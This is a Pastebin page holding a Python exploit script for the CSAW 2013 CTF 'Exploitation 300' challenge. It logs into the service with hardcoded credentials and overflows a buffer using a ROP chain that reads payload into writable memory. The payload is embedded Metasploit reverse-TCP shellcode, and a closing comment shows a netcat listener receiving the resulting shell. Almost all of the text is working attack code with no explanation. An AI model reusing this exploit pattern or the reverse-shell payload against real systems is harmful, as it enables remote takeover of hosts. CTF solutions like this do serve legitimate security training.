neonblue

csaw 2013 exploitation 300

Dec 2nd, 2013
183
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from struct import pack, unpack
  2. from socket import *
  3. import time
  4.  
  5. p = lambda x : pack("<I", x)
  6. up = lambda x : unpack("<I", x)[0]
  7.  
  8. HOST = "192.168.0.109"
  9. PORT = 34266
  10.  
  11. # linux/x86/shell_reverse_tcp - 95 bytes
  12. # http://www.metasploit.com
  13. shellcode = ("\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\xba\x5c\xa8"  
  14.             "\x72\xf6\x83\xed\xfc\x31\x55\x13\x03\x09\xbb\x90\x03\x80"  
  15.             "\x60\xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01"  
  16.             "\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16"  
  17.             "\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f"  
  18.             "\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0"  
  19.             "\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66")
  20.  
  21. freespace = 0x0804b000 # rwx
  22. recv = 0x08048890
  23. pr = 0x08048943
  24. offset = 0x41c
  25.  
  26. print "[*] CSAW Exploitation Level3 Exploit" # by sweetchip
  27. s = socket(AF_INET,SOCK_STREAM)
  28. s.connect((HOST,PORT))
  29.  
  30. print s.recv(4096)
  31. print s.recv(4096)
  32. s.send("csaw2013")
  33.  
  34. print s.recv(4096)
  35. s.send("S1mplePWD")
  36.  
  37. print s.recv(4096)
  38. s.send("-1")
  39.  
  40. print s.recv(4096)
  41. time.sleep(1)
  42.  
  43.  
  44. payload = "A"*(0x41c+4) # ebp
  45. payload += p(recv)      # rop_start
  46. payload += p(pr)
  47. payload += p(4)
  48. payload += p(freespace)
  49. payload += p(len(shellcode))
  50. payload += p(0)
  51.  
  52. s.send(payload)
  53. s.send(shellcode)
  54. raw_input("\ngive me shell! > ")
  55.  
  56. """
  57. C:\Users\Administrator>nc -lvp 12071
  58. listening on [any] 12071 ...
  59. 192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
  60. connect to [192.168.0.93] from (UNKNOWN) [192.168.0.1] 51765: NO_DATA
  61. whoami
  62. sweetchip
  63. """
RAW Paste Data